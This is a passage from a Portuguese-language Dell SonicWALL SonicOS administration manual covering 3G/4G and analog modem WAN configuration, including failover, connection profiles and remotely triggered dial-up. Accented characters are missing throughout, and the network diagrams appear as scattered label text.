canal lgico. O LACP permite o balanceamento de carga pelos dispositivos
conectados.
LLDP Link Layer Discovery Protocol (IEEE 802.1AB) O LLDP um protocolo de

Camada 2 usado por dispositivos de rede para comunicar a sua identidade,
recursos e interconexes. Essas informaes so armazenadas em um banco de
dados do MIB em cada host, que pode ser consultado com o SNMP para
determinar a topologia de rede. As informaes incluem o nome do sistema,
nome da porta, nome da VLAN, endereo IP, recursos do sistema (comutao,
roteamento), endereo MAC, agregao de links, entre outras.
LLTD Link Layer Topology Discovery (Padro da Microsoft) A LLTD um protocolo de

propriedade da Microsoft com funcionalidade semelhante ao LLDP. Ele funciona
em redes com ou sem fio (Ethernet 802.3 ou sem fio 802.11). O LLTD est
includo no Windows Vista e Windows 7 e pode ser instalado no Windows XP.
PDU Protocol Data Unit No contexto do recurso Comutao, a PDU de Camada 2

o quadro. Ela contm o cabealho da camada de link, seguido pelo pacote.
RSTP Rapid Spanning Tree Protocol (Protocolo de rvore de Verificao Rpida) (IEEE
802.1D-2004) O RSTP foi definido em 1998 como uma melhoria para o
Spanning Tree Protocol. Ele fornece uma convergncia de rvore de verificao
mais rpida depois de uma alterao na topologia.

Parte 6
3G/4G/Modem
| 417
Captulo 30
Seleo 3G/4G/Modem
3G/4G/Modem
Os dispositivos de segurana de rede da Dell SonicWALL com porta de extenso USB podem
suportar uma interface externa de 3G/4G ou uma interface de modem analgico. Se o
dispositivo no detectar uma interface externa, ser exibida uma guia 3G/4G/Modem na barra
de navegao do lado esquerdo.
Seleo 3G/4G/Modem | 419

Selecionar o status 3G/4G/Modem
Por padro, o dispositivo de segurana de rede Dell SonicWALL tentar detectar
automaticamente se um dispositivo externo conectado uma interface de 3G/4G ou uma
interface de modem analgico. possvel especificar manualmente que tipo de interface voc
deseja configurar na pgina 3G/4G/Modem > Configuraes.
O menu suspenso Tipo de dispositivo 3G/4G/Modem fornece as seguintes opes:

Detectar automaticamente O dispositivo tenta determinar se o dispositivo um modem
3G/4G ou analgico.
3G/4G/Mvel Configura manualmente uma interface de 3G/4G.
Modem analgico Configura manualmente uma interface de modem analgico.

Captulo 31
Configurar 3G/4G
3G/4G
Esta seo descreve como configurar a interface WAN sem fio 3G/4G no dispositivo de
segurana de rede Dell SonicWALL. Ela contm as seguintes sees:
Viso geral de 3G/4G na pgina 421
3G/4G > Status na pgina 427
3G/4G > Configuraes na pgina 427
3G/4G > Avanado na pgina 429
3G/4G > Perfis de conexo na pgina 431
3G/4G > Uso de dados na pgina 438
Habilitar a interface U0/U1/M0 na pgina 439
Viso geral de 3G/4G

Os dispositivos de segurana Dell SonicWALL suportam conexes WAN sem fio 3G/4G que
usam conexes de dados em redes de celulares. A conexo 3G/4G pode ser usada para:
Failover de WAN a uma conexo que no dependente de fio ou cabo.
Redes temporrias em que a conexo pr-configurada pode no estar disponvel, como
feiras de comrcio e quiosques.
Redes mveis, se o dispositivo Dell SonicWALL estiver instalado em um veculo.
Conexo de WAN primria em que as conexes com fios no esto disponveis e os
celulares 3G/4G esto.
As sees seguintes fornecem uma viso geral de 3G/4G:
Entender os tipos de conexo 3G/4G na pgina 422
Entender o failover de 3G/4G na pgina 422
Placa de suporte 3G/4G PC na pgina 426
Suporte do provedor de servios WAN sem fio 3G/4G na pgina 426
Configurar 3G/4G | 421

Entender os tipos de conexo 3G/4G
Dependendo de seu dispositivo, quando o dispositivo 3G/4G instalado antes de iniciar o
dispositivo, este ser listado como a interface U0, U1 ou M0 (somente NSA 240) em Rede >
Interfaces para reger a interface.
As configuraes do Tipo de conexo 3G/4G fornecem controle flexvel sobre a conectividade
WAN nos dispositivos Dell SonicWALL com interfaces 3G/4G. O Tipo de conexo configurado
na pgina 3G/4G > Perfis de conexo na guia Parmetros da janela Configurao de perfil
3G/4G. So oferecidos os seguintes tipos conexo:
Conexo persistente Assim que a interface de 3G/4G estiver conectada ao provedor de
servios 3G/4G, esta permanece conectada at que o administrador a desconecte ou um
evento de rede (como o WAN ficar indisponvel) a fizer desconectar.
Conectar em dados A interface de 3G/4G conecta automaticamente quando o dispositivo
Dell SonicWALL detectar tipos de trfego de rede especficos.
Conexo manual A interface de 3G/4G est conectada somente quando o administrador
iniciar a conexo manualmente.
Cuidado Embora a conexo 3G/4G possa ser manualmente habilitada na pgina Rede > Interfaces
(clicando no boto Gerenciar para a interface U0/U1/M0), esta ao no recomendada
porque pode fazer com que as conexes automticas no funcionem como esperado. A Dell
SonicWALL recomenda reger a interface de 3G/4G usando os tipos de conexo descritos
acima.
Entender o failover de 3G/4G

importante levar-se em conta que o comportamento de failover quando a interface de WAN
primria fica inativa depende das configuraes do Tipo de conexo configuradas para o Perfil
de conexo 3G/4G. Para que a interface de 3G/4G funcione como uma interface de backup,
esta deve ser configurada como a interface de Backup final no grupo de balanceamento de
carga padro na pgina Rede > Grupo Failover e LB.
As sees seguintes descrevem os trs mtodos diferentes de failover de WAN-para-3G/4G.
Todas estas sees assumem que a interface U0/U1/M0 est configurada como a interface de
Backup final no grupo de balanceamento de carga.
Failover de 3G/4G de conexo persistente na pgina 423
Failover de Conexo em dados 3G/4G na pgina 424
Failover de 3G/4G de discagem manual na pgina 425

Failover de 3G/4G de conexo persistente
O diagrama seguinte representa a sequncia de eventos que ocorrem quando a conexo WAN
Ethernet falha e o Perfil de conexo 3G/4G est configurado para Configurao persistente.
Primary Ethernet
connection down
(successive pings fail)
Internet Internet
Internet Internet
WWAN WWAN
security
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
activity NSA 240 Ethernet security
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
activity NSA 240
Ethernet
WAN WAN
Primary Ethernet
connection re-established
(successive pings succeed)
1. Conexo Ethernet primria disponvel A interface de Ethernet WAN est conectada e

usada como a conexo primria. A interface U0/U1/M0 nunca est conectada enquanto
a interface Ethernet WAN est disponvel (a no ser que tenha sido configurada uma rota
explcita que especifica 3G/4G como a interface de destino).
2. Falha da conexo Ethernet primria A interface U0/U1/M0 iniciada e permanece no
estado "sempre ligado" enquanto a conexo Ethernet WAN est desativada.
Se outra interface Ethernet WAN estiver configurada como parte do grupo de
balanceamento de carga, ocorrer o failover primeiro para o Ethernet WAN secundrio
antes do failover para interface U0/U1/M0. Nesta situao, o failover para a interface U0/
U1/M0 ocorrer somente quando os caminhos de WAN primrio e secundrio estiverem
indisponveis.
3. Restabelecer conectividade Ethernet primria aps Failover Quando a conexo
Ethernet WAN (a porta WAN primria ou secundria, se configurada) ficar novamente
disponvel, todo o trfego LAN-para-WAN automaticamente roteado para a conexo
Ethernet WAN. Isto inclui as conexes ativas e as conexes com VPN. A conexo de
interface U0/U1/M0 fechada.
Cuidado No recomendvel configurar uma rota baseada em polticas que usa a interface U0/U1/
M0 quando a interface U0/U1/M0 est configurada como o Backup final no grupo de
balanceamento de carga. Se uma rota baseada em polticas estiver configurada para usar
a interface U0/U1/M0, a conexo permanecer at que o Tempo de conexo mximo (se
configurado) seja atingido.

Failover de Conexo em dados 3G/4G
O diagrama seguinte representa a sequncia de eventos que ocorrem quando a conexo WAN
Ethernet falha e o Perfil de conexo 3G/4G est configurado para Conectar em dados.
Primary Ethernet
connection down
Primary Ethernet
Internet Internet
Internet Internet
WWAN WWAN
security
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
activity NSA 240
Ethernet
WAN WAN
Inactivity timeout,
if enabled
Primary Ethernet Internet
Internet
connection re-established User/node attempts
(successive pings succeed) WWAN security
wlan pc card
signal
lan wan opt 1 2 3 4 5 6
link/spd
NSA 240
Ethernet LAN>WAN transfer with
on/act link/act activity
WAN qualified data
1. Conexo Ethernet primria disponvel A interface de Ethernet WAN est conectada e

usada como a conexo primria. O 3G/4G nunca est conectado enquanto a interface
Ethernet WAN est disponvel (a no ser que tenha sido configurada uma rota explcita que
especifica a interface U0/U1/M0 como a interface de destino).
2. Falha da conexo Ethernet primria A conexo da interface U0/U1/M0 no
estabelecida at que os dados enviados de qualificao tentem passar por meio do
dispositivo Dell SonicWALL.
3. Conexo 3G/4G estabelecida A conexo da interface U0/U1/M0 estabelecida quando
o dispositivo ou um n de rede tentar transferir dados de qualificao para a Internet. A
interface U0/U1/M0 permanece conectada at que o Tempo de conexo mximo (se
4. Restabelecer conectividade WAN Ethernet aps Failover Quando a conexo Ethernet
WAN ficar novamente disponvel ou o temporizador de inatividade (se configurado) for
atingido, todo o trfego LAN-para-WAN automaticamente roteado para a conexo
Ethernet WAN. A conexo de interface U0/U1/M0 terminada.
Cuidado No recomendvel configurar uma rota baseada em polticas que usa a interface U0/U1/
M0 quando a interface U0/U1/M0 est configurada como o Backup final no grupo de
balanceamento de carga. Se uma rota baseada em polticas estiver configurada para usar
a interface U0/U1/M0, a conexo permanecer at que o Tempo de conexo mximo (se

Failover de 3G/4G de discagem manual
Cuidado A Dell SonicWALL no recomenda o uso de um Perfil de conexo 3G/4G de discagem

manual quando a interface U0/U1/M0 se destina a ser usada como um backup de failover
para a interface de WAN primria. Isto porque, no caso de uma falha de WAN, o dispositivo
perder a conectividade de WAN at que a conexo de interface U0/U1/M0 seja
manualmente iniciada pelo administrador.
O diagrama seguinte representa a sequncia de eventos que ocorrem quando a conexo

WAN Ethernet falha e o Perfil de conexo 3G/4G est configurado para Discagem manual.
Primary Ethernet
connection down
Primary Ethernet
Internet Internet
Internet Internet
WWAN WWAN
security
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
on/act
wlan pc card
signal
link/act
lan wan opt 1 2 3 4 5 6
link/spd
activity NSA 240
Ethernet
WAN WAN
Administrator manually
disconnects WWAN
Internet using SonicOS interface
Internet
WWAN Ethernet
Administrator manually
wlan pc card lan wan opt 1 2 3 4 5 6
security signal link/spd
on/act link/act activity NSA 240
WAN
connects WWAN using
SonicOS interface
1. Conexo Ethernet primria disponvel A Ethernet WAN est conectada e usada

como a conexo primria. O 3G/4G nunca est conectado enquanto a conexo Ethernet
WAN est disponvel.
2. Falha da conexo Ethernet primria - A conexo da interface U0/U1/M0 no
estabelecida at que o administrador habilite a conexo manualmente.
3. Conexo 3G/4G estabelecida Uma conexo de interface U0/U1/M0 estabelecida
quando o administrador habilita manualmente a conexo no dispositivo Dell SonicWALL. A
interface U0/U1/M0 permanece conectada at que o administrador desabilite a conexo
manualmente.
4. Restabelecer a conectividade WAN Ethernet aps failover Independentemente de a
conexo Ethernet ficar disponvel novamente, todo o trfego LAN-para-WAN usar
ainda a conexo 3G/4G manualmente habilitada at que a conexo seja desabilitada
manualmente pelo administrador. Aps uma desconexo manual, ser usada a conexo
Ethernet disponvel.

Placa de suporte 3G/4G PC
Para usar a interface de 3G/4G, necessrio ter uma placa 3G/4G PC e um contrato com um
provedor de servios sem fio. Um provedor de servios de 3G/4G deve ser selecionado
principalmente com base na disponibilidade do hardware suportado. O SonicOS Enhanced
(3.6 e verses posteriores) suporta as placas 3G/4G PC listadas online em:
http://www.SonicWALL.com/us/products/cardsupport.html
Suporte do provedor de servios WAN sem fio 3G/4G

O SonicOS Enhanced suporta os seguintes provedores de rede sem fio 3G/4G (esta lista est
sujeita alteraes):
AT&T
H3G
Orange
Sprint PCS Wireless
Telecom Italia Mobile
Telefonica
T-Mobile
TDC Song
Verizon Wireless
Vodafone
Pr-requisitos de 3G/4G
Antes de configurar a interface de 3G/4G, necessrio concluir os seguintes pr-requisitos:
Adquirir um servio de planos 3G/4G de um provedor sem fio de terceiros suportado
Configurar e ativar sua placa 3G/4G
Inserir a placa 3G/4G no dispositivo Dell SonicWALL antes de ligar o dispositivo de
segurana Dell SonicWALL.
Nota A placa 3G/4G s deve ser inserida ou removida com o dispositivo Dell SonicWALL
desligado.
Para obter mais informaes sobre como configurar estes pr-requisitos, consulte o Guia de
noes bsicas Dell SonicWALL para seu modelo.
As sees seguintes descrevem como configurar a interface U0/U1/M0 para a placa 3G/4G no
dispositivo Dell SonicWALL:
3G/4G > Status na pgina 427
3G/4G > Configuraes na pgina 427
3G/4G > Avanado na pgina 429
3G/4G > Perfis de conexo na pgina 431
3G/4G > Uso de dados na pgina 438
Habilitar a interface U0/U1/M0 na pgina 439
A maior parte das configuraes 3G/4G tambm pode ser configurada na pgina Rede >
Interfaces de rede. Os perfis de conexo 3G/4G s podem ser configurados na pgina 3G/4G
> Perfis de conexo.

3G/4G > Status
A pgina 3G/4G > Status exibe o status atual do 3G/4G no dispositivo Dell SonicWALL. Indica
o status da conexo 3G/4G, a interface de WAN ativa atual ou a interface de WAN de backup
atual. Tambm exibe informaes do endereo IP, endereos do servidor DNS, o perfil de
discagem ativo atual e a fora do sinal atual.
3G/4G > Configuraes

Na pgina 3G/4G > Configuraes, possvel definir as seguintes configuraes:
Viso geral de 3G/4G na pgina 421
Conectar em dados na pgina 428
Gerenciamento/Login do usurio na pgina 428
Configuraes de 3G/4G
Tipo de dispositivo 3G/4G/Mvel Selecione se est usando uma conexo 3G/4G/Mvel, um
Modem analgico ou a Deteco automtica.

Conectar em dados
As configuraes Conectar em categorias de dados permitem configurar a interface de 3G/
4G para conectar automaticamente ao provedor de servios 3G/4G quando o dispositivo Dell
SonicWALL detectar tipos de trfego especficos. Conectar em categorias de dados inclui:
Pacotes NTP
Pulsaes de GMS
E-mails de log de sistema
Atualizaes de perfil do AV
Capturas de SNMP
Atualizaes licenciadas
Solicitaes de atualizao de firmware
Trfego de syslog
Para configurar o dispositivo Dell SonicWALL para a operao Conectar em dados,
necessrio selecionar Conectar em dados como o Tipo de conexo para o Perfil de conexo.
Consulte 3G/4G > Perfis de conexo na pgina 431 para obter mais detalhes.
Gerenciamento/Login do usurio
A seo Gerenciamento/Login do usurio deve ser configurada para habilitar o
gerenciamento remoto do dispositivo Dell SonicWALL na interface de 3G/4G.
possvel selecionar qualquer um dos protocolos de gerenciamento suportados: HTTPS,

Ping, SNMP e/ou SSH. Tambm possvel selecionar HTTP para o gerenciamento de trfego.
Porm, tenha em ateno que o trfego HTTP menos seguro do que o HTTPS.
Selecione Adicionar regra para habilitar o redirecionamento de HTTP para HTTPS para
que o Dell SonicWALL converta automaticamente solicitaes HTTP para solicitaes HTTPS
para uma maior segurana.
Nota Em verses anteriores do SonicOS, o monitoramento de investigao para a interface de

3G/4G era configurado na pgina 3G/4G > Configuraes. Agora, o monitoramento de
investigao configurado na pgina Rede > Failover e LB. Consulte Realizar o
balanceamento de carga de membros e grupos na pgina 256 para obter mais
informaes.

3G/4G > Avanado
A pgina 3G/4G > Avanado usada para configurar os seguintes recursos:
Discagem acionada remotamente na pgina 429
Gerenciamento de largura de banda na pgina 430
Limite de conexo na pgina 430
Discagem acionada remotamente

O recurso Discagem acionada remotamente permite aos administradores de rede iniciar
remotamente uma conexo de modem WAN. O processo seguinte descreve como uma
chamada de Discagem acionada remotamente funciona:
1. O administrador de rede inicia uma conexo de modem para o dispositivo de segurana
Dell SonicWALL localizado no escritrio remoto.
2. Se o dispositivo for configurado para autenticar a chamada de entrada, este solicita que o
administrador de rede insira uma senha. Assim que a chamada for autenticada, o
dispositivo termina a chamada.
3. O dispositivo inicia, ento, uma conexo de modem para seu ISP de discagem, com base
no perfil de discagem configurado.
4. O administrador de rede acessa a interface de gerenciamento da Web do dispositivo para
executar as tarefas necessrias.
Antes de configurar o recurso Discagem acionada remotamente, certifique-se de que sua
configurao cumpra os seguintes pr-requisitos:
O perfil de conexo 3G/4G est configurado para dados de discagem.
O dispositivo de segurana Dell SonicWALL est configurado para ser gerenciado usando
HTTPS, de forma que o dispositivo possa ser acessado remotamente.

recomendvel inserir um valor no campo Habilitar desconexo por inatividade. Este
campo est localizado na janela Configurao do perfil 3G/4G na guia Parmetros.
Consulte 3G/4G > Perfis de conexo na pgina 431 para obter mais informaes. Se
no inserir um valor neste campo, as chamadas de discagem permanecero conectadas
por tempo indefinido e ser necessrio terminar as sesses clicando no boto
Desconectar.
Para configurar a Discagem acionada remotamente, acesse a tela 3G/4G > Avanado.
Etapa 1 Verifique a caixa de seleo Habilitar discagem acionada remotamente.

Etapa 2 (Opcional) Para autenticar a chamada remota, marque a caixa de seleo Requer
autenticao e insira a senha nos campos Senha: e Confirmar senha:.

O recurso Gerenciamento de largura de banda permite ao administrador habilitar os servios
de gerenciamento de largura de banda de egresso ou ingresso na interface de 3G/4G.
Para obter informaes sobre a configurao do gerenciamento de largura de banda, consulte
Configuraes de firewall > BWM na pgina 677.
Limite de conexo
A seo Limite de conexo permite ao administrador configurar um host/limite de n na
conexo 3G/4G. Este recurso especialmente til para implantaes em que a conexo 3G/
4G usada como uma sobrecarga ou em situaes de balanceamento de carga para evitar a
sobretaxao da conexo.
No campo Mx. de hosts, insira o nmero mximo de hosts a permitir quando esta interface
est conectada. O valor padro "0", permitindo um nmero ilimitado de ns.

3G/4G > Perfis de conexo
Use a pgina 3G/4G > Perfis de conexo para configurar os perfis de conexo 3G/4G e
configurar os perfis primrio e alternativo.
Selecione o perfil de conexo 3G/4G primrio no menu suspenso Perfil primrio.

Opcionalmente, pode selecionar at dois perfis 3G/4G alternativos.
Para criar um perfil de conexo 3G/4G, clique no boto Adicionar e execute as etapas nas
seguintes sees:
Guia Geral na pgina 432
Guia Parmetros na pgina 433
Guia endereos IP na pgina 434
Guia Programao na pgina 435
Guia Limite de dados na pgina 436
Guia Avanado na pgina 437

Guia Geral
A guia Geral permite ao administrador configurar as configuraes de conexo gerais para o
provedor de servios 3G/4G. Aps selecionar seu pas, provedor de servios e tipo de
plano, os restantes campos so preenchidos automaticamente para a maior parte dos
provedores de servios.
Etapa 1 Na pgina 3G/4G > Perfis de conexo, clique no boto Adicionar. exibida a janela
Configurao de perfil 3G/4G.
Etapa 2 Selecione o Pas onde o dispositivo Dell SonicWALL implantado.

Etapa 3 Selecione o Provedor de servios com o qual voc criou uma conta. Note que sero exibidos
somente os provedores de servios suportados no pas selecionado.
Etapa 4 Na janela Tipo de plano, selecione o plano 3G/4G que voc subscreveu com o provedor de
servios. Se seu tipo de plano especfico estiver listado no menu suspenso (muitos planos
bsicos so rotulados simplesmente como padro), os restantes campos na guia Geral so
automaticamente fornecidos. Verifique se estes campos esto corretos e salte para Guia
Parmetros na pgina 433.
Etapa 5 Se seu Tipo de plano no estiver listado no menu suspenso, selecione Outro.
Etapa 6 Insira um nome para o perfil 3G/4G no campo Nome do perfil.
Etapa 7 Verifique se o Tipo de conexo apropriado est selecionado. Note que este campo
automaticamente fornecido para a maior parte dos provedores.
Etapa 8 Verifique se o Nmero discado est correto. Note que o nmero discado *99# para a maior
parte dos Provedores de servios.
Etapa 9 Insira seu nome de usurio e sua senha nos campos Nome de usurio, Senha do usurio e
Confirmar senha do usurio, respectivamente, se exigido pelo seu provedor.

Guia Parmetros
A guia Parmetros permite ao administrador configurar sob determinadas condies as
conexes de servio 3G/4G. Os trs tipos de conexo so Persistente, Conectar em dados
e Manual. A mecnica destes tipos de conexo descrita em Entender os tipos de conexo
3G/4G na pgina 422.
Etapa 1 Clique na guia Parmetros.
Etapa 2 No menu suspenso Tipo de conexo, selecione se o perfil de conexo uma Conexo
persistente, Conectar em dados ou Discagem manual.
Nota Para configurar o dispositivo Dell SonicWALL para discagem acionada remotamente, o
Tipo de conexo deve ser Conectar em dados. Consulte 3G/4G > Avanado na
pgina 429 para obter mais informaes.
Etapa 3 Selecione a caixa de seleo Habilitar desconexo por inatividade (minutos) e insira um
nmero no campo para ter a conexo 3G/4G desconectada aps o nmero especificado de
minutos de inatividade. Note que esta opo no est disponvel se o Tipo de conexo for a
Conexo persistente.
Etapa 4 Selecione a caixa de seleo Habilitar tempo mx. de conexo (minutos) e insira um nmero
no campo para ter a conexo 3G/4G desconectada aps o nmero especificado de minutos,
independentemente de a sesso estar inativa ou no. Insira um valor no campo Atraso antes
da reconexo (minutos) para que o dispositivo Dell SonicWALL reconecte automaticamente
aps o nmero especificado de minutos.

Etapa 5 Selecione a caixa de seleo Repeties de discagem por nmero de telefone e insira um
nmero no campo para especificar o nmero de vezes que o dispositivo Dell SonicWALL pode
tentar se reconectar.
Etapa 6 Selecione a caixa de seleo Atraso entre repeties (segundos) e insira um nmero no
campo para especificar o nmero de segundos entre novas tentativas.
Etapa 7 Selecione a caixa de seleo Desabilitar VPN quando discado para desabilitar as conexes
VPN na interface de 3G/4G.
Guia endereos IP
A guia Endereos IP permite ao administrador configurar endereos IP estticos ou dinmicos
para esta interface. Na maior parte dos casos, este recurso configurado para Obter um
endereo IP automaticamente. Porm, possvel configurar endereos IP manuais para seu
endereo IP do gateway e um ou mais endereos IP do servidor de DNS se solicitado pelo seu
provedor de servios.
Etapa 1 Clique na guia Endereos IP.
Por padro, os perfis de conexo 3G/4G so configurados para obter endereos IP e

endereos do servidor de DNS automaticamente. Para especificar um endereo IP esttico,
selecione a caixa de opo Usar o endereo IP seguinte e insira o endereo IP no campo.
Para inserir endereos de servidor de DNS manualmente, selecione a caixa de opo Usar o
endereo IP seguinte e insira os endereos IP dos servidores de DNS primrio e secundrio
nos campos.

Guia Programao
A guia Programao permite ao administrador limitar conexes 3G/4G para tempos
especificados durante dias da semana especficos. Este recurso til para planos de dados
em que o acesso limitado durante determinadas horas do dia, como planos com minutos
grtis de noite/final de semana.
Nota Quando este recurso est habilitado, se uma caixa de seleo para um dia no for
selecionada, o acesso 3G/4G ser negado para todo esse dia.
Etapa 1 Clique na guia Programao.
Etapa 2 Selecione a caixa de seleo Limitar tempos para o perfil de conexo para habilitar o
recurso de programao para esta interface.
Etapa 3 Selecione a caixa de seleo para cada Dia da semana em que deseja acessar.
Etapa 4 Insira a Hora de incio e a Hora de fim (no formato de 24 horas) para cada dia da semana.

Guia Limite de dados
A guia Limite de dados permite ao administrador limitar o uso de dados em uma base mensal.
Este recurso oferece a capacidade de controlar o uso com base no ciclo de faturamento de seu
provedor 3G/4G e desconectar quando um determinado limite for atingido.
Etapa 1 Clique na guia Limite de dados.
Dica Se sua conta 3G/4G tiver limite de dados mensais ou de tempo, extremamente
recomendvel a habilitao do Limite do uso de dados.
Etapa 2 Selecione a caixa de seleo Habilitar limite do uso de dados para que a interface de 3G/4G
fique automaticamente desabilitada quando o limite de dados ou de tempo especificado tiver
sido atingido para o ms.
Etapa 3 Selecione o dia do ms para comear controlando o uso de dados mensal ou o tempo no menu
suspenso Data de incio do ciclo de faturamento.
Etapa 4 Insira um valor no campo Limite e selecione o fator de limite apropriado: GB, MB, KB ou
minutos.

Guia Avanado
A guia Avanado permite ao administrador configurar manualmente um script de bate-papo
usado durante o processo de conexo 3G/4G. A configurao de um script bate-papo s
necessria quando no necessrio adicionar comandos ou instrues especiais ao script de
conexo de discagem padro.
Etapa 2 Insira o script de bate-papo da conexo no campo Script de bate-papo.


3G/4G > Uso de dados
Na pgina 3G/4G > Uso de dados possvel monitorar a quantidade de dados transferidos na
interface de 3G/4G na tabela Uso de dados e ver os detalhes das sesses 3G/4G na tabela
Histrico da sesso.
A tabela Uso de dados exibe o uso de dados atual e o tempo online para o Ano, Ms,
Semana, Dia e Ciclo de faturamento. O uso do ciclo de faturamento s calculado se a
opo Habilitar limite do uso de dados estiver habilitada no Perfil de conexo 3G/4G.
Clique no boto Redefinir apropriado para redefinir qualquer uma das categorias de uso de
dados.
Nota A tabela Uso de dados somente uma estimativa do uso atual e no deve ser usada para
calcular as taxas reais. Contate seu Provedor de servios para obter informaes precisas
sobre o faturamento.
A tabela Histrico da sesso exibe um resumo das informaes sobre as sesses 3G/4G.
Para ver detalhes adicionais sobre uma sesso especfica, coloque o cursor do mouse sobre
o balo Propriedades.

Habilitar a interface U0/U1/M0
Cuidado Embora a conexo 3G/4G possa ser manualmente habilitada na pgina Rede > Interfaces
(clicando no boto Gerenciar para a interface U0/U1/M0), esta ao no recomendada
porque pode fazer com que as conexes automticas no funcionem como esperado. A Dell
SonicWALL recomenda reger a interface de 3G/4G usando os tipos de conexo descritos
acima.
Para iniciar manualmente uma conexo na interface de 3G/4G externa U0/U1/M0, execute as
seguintes etapas:
Etapa 1 Na pgina Rede > Interfaces, clique no boto Gerenciar para a interface U0/U1/M0.
Etapa 2 exibida a janela Status de conexo de U0/U1/M0. Clique no boto Conectar. Assim que a
conexo estiver ativa, a janela Status de conexo de U0/U1/M0 exibe as estatsticas na
sesso.

Captulo 32
Configurando o modem
Modem
As sees a seguir descrevem como configurar e usar a funcionalidade de modem em um
dispositivo de segurana de rede Dell SonicWALL:
Modem > Status na pgina 441
Modem > Configuraes na pgina 442
Modem > Avanado na pgina 443
Modem > Perfis de conexo na pgina 445
Modem > Status

A pgina Modem > Status exibe informaes de conexo de discagem quando o modem
estiver ativo. Crie os Perfis de conexo do modem na janela Configurao do perfil do
modem, que voc acessar na pgina Modem > Perfis de Conexo.
Na seo Status do modem, as informaes de rede ativas atuais do seu ISP sero exibidas
quando o modem estiver ativo:
Endereo (Roteador) do gateway da WAN
Endereo IP (pblico de NAT) da WAN
Mscara de sub-rede da WAN
Servidor DNS 1
Servidor DNS 2
Servidor DNS 3
Perfil de discagem ativo atual (id)
Velocidade de conexo atual
Se o modem estiver inativo, a pgina Status exibir uma lista de possveis razes pelas quais
seu modem est inativo. Quando o modem estiver ativo, as configuraes de rede do ISP so
usadas para o acesso WAN.
Configurando o modem | 441

Modem > Configuraes
A pgina Modem > Configuraes permite que voc defina as configuraes do modem,
especifique as categorias de Conectar em dados, selecione o gerenciamento e opes de login
do usurio e selecione os perfis de modem primrio e alternativo.
Tipo do dispositivo do modem Selecione se voc est usando um Modem analgico, uma
Conexo 3G/Mobile ou Detecte automaticamente.
Volume do alto-falante Selecione se deseja ligar ou desligar o alto-falante do modem.
O valor padro Ligado.
Inicializao do modem Selecione Inicializar modem para uso em e selecione o pas
no menu suspenso. Estados Unidos selecionado por padro. Se o modem usa
comandos AT para inicializar, selecione Inicializar modem usando comandos AT. Digite
todos os comandos AT usados no modem no campo Comandos AT (para inicializao
do modem). Os comandos AT so instrues usadas para controlar um modem como
ATS7=30 (permite at 30 segundos de espera por um tom de discagem) e ATS8=2 (define
a quantidade de tempo que o modem pausa quando encontra uma vrgula (",") na cadeia
de caracteres).
Conectar em categorias de dados

As configuraes Conectar em categorias de dados permitem que voc especifique os
dados de sada que so detectados antes que o modem disque o ISP. Os dados de sada no
precisam ser o riginados de computadores na LAN; eles tambm pode ser pacotes gerados
pelos aplicativos de segurana do dispositivo de segurana Dell SonicWALL.

O campo Conectar em categorias de dados inclui:
Pacotes NTP
Pulsaes de GMS
E-mails de log de sistema
Atualizaes de perfil do AV
Capturas de SNMP
Atualizaes licenciadas
Solicitaes de atualizao de firmware
Trfego de syslog
Gerenciamento/Login do usurio
A seo Gerenciamento/Login do usurio permite habilitar o gerenciamento remoto do
dispositivo de segurana Dell SonicWALL ou do login de usurio a partir da interface do
Modem.
possvel selecionar qualquer um dos protocolos de gerenciamento suportados: HTTPS,

Ping, SNMP e/ou SSH. Tambm possvel selecionar HTTP para o gerenciamento de trfego.
Porm, tenha em ateno que o trfego HTTP menos seguro do que o HTTPS.
Selecione Adicionar regra para habilitar redirecionamento de HTTP para HTTPS para
permitir que o Dell SonicWALL converta automaticamente as solicitaes de HTTP em
solicitaes de HTTPS para uma maior segurana.
Modem > Avanado

A pgina Modem > Avanado usada para configurar o recurso Discagem acionada
remotamente, que permite aos administradores de rede iniciar remotamente uma conexo de
modem WAN a partir de um dispositivo de segurana de rede Dell SonicWALL.
Discagem acionada remotamente

O processo a seguir descreve o funcionamento de uma chamada com Discagem acionada
remotamente:
1. O administrador de rede inicia uma conexo de modem com o Dell SonicWALL localizado
no escritrio remoto.
2. Se o Dell SonicWALL estiver configurado para autenticar a chamada recebida, ele
solicitar que o administrador de rede digite uma senha. Depois de autenticada, a
chamada ser encerrada pelo Dell SonicWALL.

Nota Depois de trs tentativas de senha incorreta, o Dell SonicWALL encerrar uma sesso de
autenticao da Discagem acionada remotamente. Cada tentativa de senha tem permisso
a um mximo de 60 segundos. Se uma sesso de discagem for encerrada, o Dell
SonicWALL pode ser chamado novamente para outra sesso de autenticao da Discagem
acionada remotamente.
3. O Dell SonicWALL ento iniciar uma conexo de modem com seu ISP de discagem com
base no perfil de discagem configurado.
4. O administrador de rede acessa a interface de gerenciamento da web do Dell SonicWALL
para realizar as tarefas necessrias.
Nota Se o trfego LAN a WAN no Dell SonicWALL gerar uma solicitao de discagem ao mesmo
tempo que uma sesso de Discagem acionada remotamente estiver sendo autenticada, a
sesso de Discagem acionada remotamente ser encerrada e o Dell SonicWALL iniciar a
sua prpria sesso de discagem.
Configurando a Discagem acionada remotamente

Antes de configurar o recurso Discagem acionada remotamente, certifique-se de que sua
configurao atende aos seguintes pr-requisitos:
O perfil de discagem est configurado para dados de discagem.
O Dispositivo de Segurana Dell SonicWALL configurado para ser gerenciado com o uso
do HTTPS para que o dispositivo possa ser acessado remotamente.
Digite um valor no campo Habilitar tempo mx. de conexo (minutos). Se voc no
digitar um valor neste campo, as chamadas com discagem permanecero conectadas por
tempo indeterminado e voc ter que encerrar as sesses manualmente, clicando no boto
Desconectar.
Para configurar a Discagem acionada remotamente, faa o seguinte:
Etapa 1 acesse a tela Modem > Avanado.
Etapa 2 Marque a caixa de seleo Habilitar Discagem acionada remotamente.

Etapa 3 (Opcional) Para autenticar a chamada remota, marque a caixa de seleo Requer
autenticao e digite a senha nos campos Senha: e Confirmar Senha:.

A seo Gerenciamento de largura de banda permite que o administrador habilite os
servios de gerenciamento de largura de banda de entrada ou de sada na interface do
modem.

Para obter informaes sobre a configurao do Gerenciamento de largura de banda, consulte
Limite de conexo
A seo Limite de conexo permite que o administrador defina um limite de hosts/ns na
conexo do modem. Esse recurso especialmente til para implantaes nas quais a conexo
